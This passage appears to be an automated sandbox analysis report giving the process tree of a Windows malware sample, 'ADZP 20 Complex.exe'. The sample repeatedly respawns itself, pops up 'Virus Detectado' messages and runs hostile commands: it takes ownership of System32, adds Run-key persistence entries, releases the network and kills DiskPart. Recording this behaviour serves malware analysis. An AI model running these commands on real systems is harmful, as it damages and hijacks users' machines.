        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        49⤵
        
        PID:16028
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        49⤵
        
        PID:16052
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        49⤵
        
        PID:16080
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        49⤵
        
        PID:16112
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        49⤵
        
        PID:16148
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        49⤵
        
        PID:16176
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        49⤵
        
        PID:16192
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        49⤵
        
        PID:16232
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        49⤵
        
        PID:16252
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        49⤵
        
        PID:16292
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        49⤵
        
        PID:16308
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        49⤵
        
        PID:16324
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        49⤵
        
        PID:16348
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BC60.tmp\BC61.tmp\BC62.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        50⤵
        
        PID:15444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        51⤵
        
        PID:15948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        51⤵
        
        PID:8316
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        51⤵
        
        PID:13552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        51⤵
        
        PID:13632
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        52⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4072
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        51⤵
        
        PID:16300
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        51⤵
        
        PID:10276
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        51⤵
        Gathers network information
        
        PID:7096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        51⤵
        Kills process with taskkill
        
        PID:14364
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        51⤵
        Views/modifies file attributes
        
        PID:6044
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        51⤵
        
        PID:15404
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        51⤵
        
        PID:16372
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        51⤵
        
        PID:7508
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        51⤵
        
        PID:10244
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        51⤵
        
        PID:15800
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        51⤵
        
        PID:14040
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        51⤵
        
        PID:15480
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        51⤵
        
        PID:13120
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        51⤵
        
        PID:11164
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        51⤵
        
        PID:4900
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        51⤵
        
        PID:15952
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        51⤵
        
        PID:10824
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        51⤵
        
        PID:5620
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        51⤵
        
        PID:4896
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E6DB.tmp\E6DC.tmp\E6DD.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        52⤵
        
        PID:13824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        53⤵
        
        PID:11432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        53⤵
        
        PID:16288
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        53⤵
        
        PID:5108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        53⤵
        
        PID:4104
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        54⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:15952
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        53⤵
        
        PID:11792
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        53⤵
        
        PID:13868
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        53⤵
        Gathers network information
        
        PID:15912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        53⤵
        Kills process with taskkill
        
        PID:15908
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        53⤵
        Views/modifies file attributes
        
        PID:4492
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        53⤵
        
        PID:11384
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        53⤵
        
        PID:3216
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        53⤵
        
        PID:14248
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        53⤵
        
        PID:11728
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        53⤵
        
        PID:15676
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        53⤵
        
        PID:15740
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        53⤵
        
        PID:13868
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        53⤵
        
        PID:15912
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        53⤵
        
        PID:196
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        53⤵
        
        PID:11944
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        53⤵
        
        PID:14652
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        53⤵
        
        PID:12032
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        53⤵
        
        PID:10532
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        53⤵
        
        PID:9692
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\25A9.tmp\25AA.tmp\25AB.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        54⤵
        
        PID:10252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        55⤵
        
        PID:10264
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        56⤵
        
        PID:9320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        55⤵
        
        PID:11056
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        56⤵
        
        PID:11496
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        55⤵
        
        PID:708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        55⤵
        
        PID:7560
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        56⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12244
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        55⤵
        
        PID:11540
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        55⤵
        
        PID:15908
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        55⤵
        Gathers network information
        
        PID:10708
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        55⤵
        Kills process with taskkill
        
        PID:14296
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        55⤵
        Views/modifies file attributes
        
        PID:12392
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        55⤵
        
        PID:6168
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        55⤵
        
        PID:7284
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        55⤵
        
        PID:9516
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        55⤵
        
        PID:13192
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        55⤵
        
        PID:4184
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        55⤵
        
        PID:11092
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        55⤵
        
        PID:7968
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        55⤵
        
        PID:7376
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        55⤵
        
        PID:1860
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        55⤵
        
        PID:13204
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        55⤵
        
        PID:15980
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        55⤵
        
        PID:6728
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        55⤵
        
        PID:8220
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        55⤵
        
        PID:5212
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\546A.tmp\546B.tmp\546C.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        56⤵
        
        PID:16404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        57⤵
        
        PID:16960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        57⤵
        
        PID:16976
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        57⤵
        
        PID:17108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        57⤵
        
        PID:17156
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        58⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:17272
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        57⤵
        
        PID:17188
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        57⤵
        
        PID:17224
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        57⤵
        Gathers network information
        
        PID:17280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        57⤵
        Kills process with taskkill
        
        PID:17352
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        57⤵
        Views/modifies file attributes
        
        PID:16400
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        57⤵
        
        PID:7788
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        57⤵
        
        PID:6004
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        57⤵
        
        PID:16532
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        57⤵
        
        PID:16528
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        57⤵
        
        PID:14636
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        57⤵
        
        PID:16472
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        57⤵
        
        PID:16616
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        57⤵
        
        PID:16364
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        57⤵
        
        PID:16396
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        57⤵
        
        PID:13444
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        57⤵
        
        PID:16684
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        57⤵
        
        PID:13472
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        57⤵
        
        PID:16744
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        57⤵
        
        PID:16760
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8F02.tmp\8F03.tmp\8F04.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        58⤵
        
        PID:16856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        59⤵
        
        PID:15036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        59⤵
        
        PID:11596
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        59⤵
        
        PID:9284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        59⤵
        
        PID:11628
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        60⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:17324
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        59⤵
        
        PID:10160
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        59⤵
        
        PID:12076
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        59⤵
        Gathers network information
        
        PID:13308
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        59⤵
        Kills process with taskkill
        
        PID:17328
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        59⤵
        Views/modifies file attributes
        
        PID:8604
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        59⤵
        
        PID:16704
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        59⤵
        
        PID:16684
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        59⤵
        
        PID:15524
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        59⤵
        
        PID:15584
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        59⤵
        
        PID:15596
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        59⤵
        
        PID:12132
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        59⤵
        
        PID:13836
        
        C:\Windows\system32\notepad.exe
        
        notepad
        57⤵
        
        PID:16832
        
        C:\Windows\system32\calc.exe
        
        calc
        57⤵
        
        PID:16864
        
        C:\Windows\explorer.exe
        
        explorer.exe
        57⤵
        
        PID:7996
        
        C:\Windows\system32\notepad.exe
        
        notepad
        55⤵
        
        PID:6128
        
        C:\Windows\system32\calc.exe
        
        calc
        55⤵
        
        PID:13724
        
        C:\Windows\explorer.exe
        
        explorer.exe
        55⤵
        
        PID:16440
        
        C:\Windows\system32\notepad.exe
        
        notepad
        53⤵
        
        PID:9604
        
        C:\Windows\system32\calc.exe
        
        calc
        53⤵
        
        PID:7972
        
        C:\Windows\explorer.exe
        
        explorer.exe
        53⤵
        
        PID:14980
        
        C:\Windows\system32\notepad.exe
        
        notepad
        51⤵
        
        PID:9352
        
        C:\Windows\system32\calc.exe
        
        calc
        51⤵
        
        PID:5108
        
        C:\Windows\explorer.exe
        
        explorer.exe
        51⤵
        
        PID:10416
        
        C:\Windows\system32\notepad.exe
        
        notepad
        49⤵
        
        PID:16356
        
        C:\Windows\system32\calc.exe
        
        calc
        49⤵
        
        PID:16364
        
        C:\Windows\explorer.exe
        
        explorer.exe
        49⤵
        
        PID:16372
        
        C:\Windows\system32\notepad.exe
        
        notepad
        47⤵
        
        PID:2812
        
        C:\Windows\system32\calc.exe
        
        calc
        47⤵
        
        PID:6180
        
        C:\Windows\explorer.exe
        
        explorer.exe
        47⤵
        
        PID:7500
        
        C:\Windows\system32\notepad.exe
        
        notepad
        45⤵
        
        PID:11016
        
        C:\Windows\system32\calc.exe
        
        calc
        45⤵
        
        PID:1396
        
        C:\Windows\explorer.exe
        
        explorer.exe
        45⤵
        
        PID:12844
        
        C:\Windows\system32\notepad.exe
        
        notepad
        43⤵
        
        PID:7712
        
        C:\Windows\system32\calc.exe
        
        calc
        43⤵
        
        PID:7248
        
        C:\Windows\explorer.exe
        
        explorer.exe
        43⤵
        
        PID:15180
        
        C:\Windows\system32\notepad.exe
        
        notepad
        41⤵
        
        PID:14584
        
        C:\Windows\system32\calc.exe
        
        calc
        41⤵
        
        PID:14592
        
        C:\Windows\explorer.exe
        
        explorer.exe
        41⤵
        
        PID:14600
        
        C:\Windows\system32\notepad.exe
        
        notepad
        39⤵
        
        PID:10976
        
        C:\Windows\system32\calc.exe
        
        calc
        39⤵
        
        PID:11020
        
        C:\Windows\explorer.exe
        
        explorer.exe
        39⤵
        
        PID:11084
        
        C:\Windows\system32\notepad.exe
        
        notepad
        37⤵
        
        PID:10072
        
        C:\Windows\system32\calc.exe
        
        calc
        37⤵
        
        PID:10060
        
        C:\Windows\explorer.exe
        
        explorer.exe
        37⤵
        
        PID:9304
        
        C:\Windows\system32\notepad.exe
        
        notepad
        35⤵
        
        PID:13512
        
        C:\Windows\system32\calc.exe
        
        calc
        35⤵
        
        PID:13520
        
        C:\Windows\explorer.exe
        
        explorer.exe
        35⤵
        
        PID:13560
        
        C:\Windows\system32\notepad.exe
        
        notepad
        33⤵
        
        PID:12824
        
        C:\Windows\system32\calc.exe
        
        calc
        33⤵
        
        PID:12836
        
        C:\Windows\explorer.exe
        
        explorer.exe
        33⤵
        
        PID:7392
        
        C:\Windows\system32\notepad.exe
        
        notepad
        31⤵
        
        PID:12468
        
        C:\Windows\system32\calc.exe
        
        calc
        31⤵
        
        PID:12520
        
        C:\Windows\explorer.exe
        
        explorer.exe
        31⤵
        
        PID:12552
        
        C:\Windows\system32\notepad.exe
        
        notepad
        29⤵
        
        PID:11856
        
        C:\Windows\system32\calc.exe
        
        calc
        29⤵
        
        PID:11756
        
        C:\Windows\explorer.exe
        
        explorer.exe
        29⤵
        
        PID:11748
        
        C:\Windows\system32\notepad.exe
        
        notepad
        27⤵
        
        PID:11560
        
        C:\Windows\system32\calc.exe
        
        calc
        27⤵
        
        PID:11580
        
        C:\Windows\explorer.exe
        
        explorer.exe
        27⤵
        
        PID:11588
        
        C:\Windows\system32\notepad.exe
        
        notepad
        25⤵
        
        PID:4396
        
        C:\Windows\system32\calc.exe
        
        calc
        25⤵
        
        PID:5300
        
        C:\Windows\explorer.exe
        
        explorer.exe
        25⤵
        
        PID:5336
        
        C:\Windows\system32\notepad.exe
        
        notepad
        23⤵
        
        PID:10944
        
        C:\Windows\system32\calc.exe
        
        calc
        23⤵
        
        PID:10952
        
        C:\Windows\explorer.exe
        
        explorer.exe
        23⤵
        
        PID:10960
        
        C:\Windows\system32\notepad.exe
        
        notepad
        21⤵
        
        PID:7108
        
        C:\Windows\system32\calc.exe
        
        calc
        21⤵
        
        PID:9452
        
        C:\Windows\explorer.exe
        
        explorer.exe
        21⤵
        
        PID:4656
        
        C:\Windows\system32\notepad.exe
        
        notepad
        19⤵
        
        PID:9464
        
        C:\Windows\system32\calc.exe
        
        calc
        19⤵
        
        PID:9472
        
        C:\Windows\explorer.exe
        
        explorer.exe
        19⤵
        
        PID:9560
        
        C:\Windows\system32\notepad.exe
        
        notepad
        17⤵
        
        PID:8592
        
        C:\Windows\system32\calc.exe
        
        calc
        17⤵
        
        PID:5164
        
        C:\Windows\explorer.exe
        
        explorer.exe
        17⤵
        
        PID:8616
        
        C:\Windows\system32\notepad.exe
        
        notepad
        15⤵
        
        PID:3104
        
        C:\Windows\system32\calc.exe
        
        calc
        15⤵
        
        PID:4324
        
        C:\Windows\explorer.exe
        
        explorer.exe
        15⤵
        
        PID:8196
        
        C:\Windows\system32\notepad.exe
        
        notepad
        13⤵
        
        PID:8156
        
        C:\Windows\system32\calc.exe
        
        calc
        13⤵
        Modifies registry class
        
        PID:8164
        
        C:\Windows\explorer.exe
        
        explorer.exe
        13⤵
        Modifies registry class
        
        PID:7224
        
        C:\Windows\system32\notepad.exe
        
        notepad
        11⤵
        
        PID:6512
        
        C:\Windows\system32\calc.exe
        
        calc
        11⤵
        Modifies registry class
        
        PID:6684
        
        C:\Windows\explorer.exe
        
        explorer.exe
        11⤵
        Modifies registry class
        
        PID:6664
        
        C:\Windows\system32\notepad.exe
        
        notepad
        9⤵
        
        PID:6544
        
        C:\Windows\system32\calc.exe
        
        calc
        9⤵
        Modifies registry class
        
        PID:6560
        
        C:\Windows\explorer.exe
        
        explorer.exe
        9⤵
        Modifies registry class
        
        PID:6580
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:5688
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        Modifies registry class
        
        PID:5692
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        Modifies registry class
        
        PID:5712
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5276
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        Modifies registry class
        
        PID:5284
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        Modifies registry class
        
        PID:5292
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2600
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    - Modifies registry class
    PID:1688
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    - Modifies registry class
    PID:1840

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3856

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5520

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:6012

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:6892

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:6912

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:6156

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8364

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8480

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9644

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7136

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11196

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8308

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11728

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6192

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12648

